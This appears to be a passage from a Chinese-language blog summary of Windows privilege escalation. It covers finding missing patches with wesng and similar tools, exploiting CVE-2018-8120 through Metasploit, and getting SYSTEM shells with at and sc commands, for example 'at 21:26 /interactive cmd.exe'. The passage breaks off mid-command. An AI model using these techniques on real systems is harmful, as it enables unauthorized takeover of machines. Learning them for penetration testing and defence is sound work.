windows提权总结
文章目录
溢出漏洞提权
拿到服务器普通权限→上传溢出程序→提权至administrator。
内核溢出漏洞总结:https://github.com/SecWiki/windows-kernel-exploits/
1)筛选服务器未打的补丁。常用工具有:
vulmap(powershell执行)
WindowsVulnScan-master
wesng
2)查找未打补丁对应能提权的的漏洞
3)利用msf提权
例:
靶机上执行systeminfo保存systeminfo.txt
攻击机上运行 python .\wes.py .\systeminfo.txt 筛选出未打的补丁
没有 打cve-2018-8120 对应的KB4131188补丁,所以我们可以利用 cve-2018-8120 进行提权
at&sc&ps命令提权
at命令(适用win7之前)
at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用的是system权限
at 21:26 /interactive cmd.exe //给系统添加一项作业,在21:26打开cmd命令
at //查看作业详情
at/del //删除作业
sc命令 (适用2003)
SC命令能与“服务控制器”和已安装设备进行通讯。SC是用于与服务控制管理器和服务进行通信的命令行程序
sc create syscmd binPath= "cmd /K start" type= own type= interact //创建一个名叫syscmd的新